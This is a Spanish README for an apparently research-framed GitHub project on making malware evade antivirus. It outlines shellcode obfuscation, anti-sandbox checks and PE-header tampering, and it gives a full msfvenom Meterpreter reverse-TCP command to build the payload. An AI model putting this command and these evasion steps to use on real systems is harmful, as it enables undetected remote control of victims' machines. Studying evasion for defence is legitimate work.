InvisMalware

1. Introducción
2. Características
3. Instalación
4. Uso
5. Metodología de experimentos
6. Pruebas
7. Que contribuye
8. Licencia

Invismalware es un proyecto diseñado para demostrar técnicas avanzadas de evasión de malware que evitan la detección de antivirus. Este experimento de malware basado en la investigación se centra en utilizar métodos de ofuscación, como modificaciones de código y estrategias anti-sandbox, para evadir la detección de malware estático y dinámico.

Este proyecto es solo para fines educativos , destinado a proporcionar información sobre las estrategias modernas de defensa de malware al aprender de las técnicas de evasión utilizadas por los actores maliciosos.

• Generación de shellcode : cree cargas útiles de shell de TCP inversa personalizadas usando MSFVENOM.
• Ofusión del código : modifique el código de malware para evadir la detección de antivirus agregando NOP, manipulando los encabezados de PE y más.
• Análisis anti-dinámico : incluya verificaciones para detectar entornos de sandbox, como el controlador de audio y la presencia del dispositivo USB.
• Manipulación del encabezado PE : disfrazar el malware ajustando el encabezado ejecutable portátil (PE) para evitar la detección basada en la firma.
• Cálculo de la tasa de evasión : mida la efectividad de las técnicas de evasión comparando los resultados en varios motores antivirus.

Para comenzar, clone el repositorio e instale las dependencias necesarias.

• Python 3.x
• Virtualbox/vmware (para probar en entornos virtuales)
• Marco de metasploit (para generar shellcode)
• PE-Bear (para la manipulación del encabezado de PE)

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

Use MSFVENOM para generar un código de shell TCP inversa:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

Edite el archivo evilexp.c para ofuscar el código y evitar la detección.

Implemente el malware en una máquina virtual segura y aislada para probar su comportamiento y medir las tasas de detección.

Cargue su malware a Virustotal para evaluar su tasa de evasión en múltiples motores antivirus.

El proyecto sigue una metodología de cuatro etapas para lograr la evasión de malware:

1. Generación de shellcode : cree la línea de base inversa de shellcode.
2. Modificación del código : ofuscan el código de shell para evadir la detección.
3. Análisis anti-dinámico : agregue la detección de sandbox para evitar herramientas de análisis dinámico.
4. Modificación del encabezado PE : altere el encabezado PE para ofuscar aún más la firma de malware.

Ejecute el malware en su máquina virtual equipada con software antivirus como Kaspersky , Windows Defender o BitDefender .

Cargue el malware modificado a Virustotal y verifique cuántos motores antivirus lo detectan con éxito.

Agradecemos contribuciones para mejorar el proyecto. Si desea contribuir:

1. Bifurca el repositorio.
2. Cree una nueva rama para su función o corrección de errores.
3. Envíe una solicitud de extracción con información detallada sobre sus cambios.

Este proyecto tiene licencia bajo la licencia MIT. Consulte el archivo de licencia para obtener más detalles.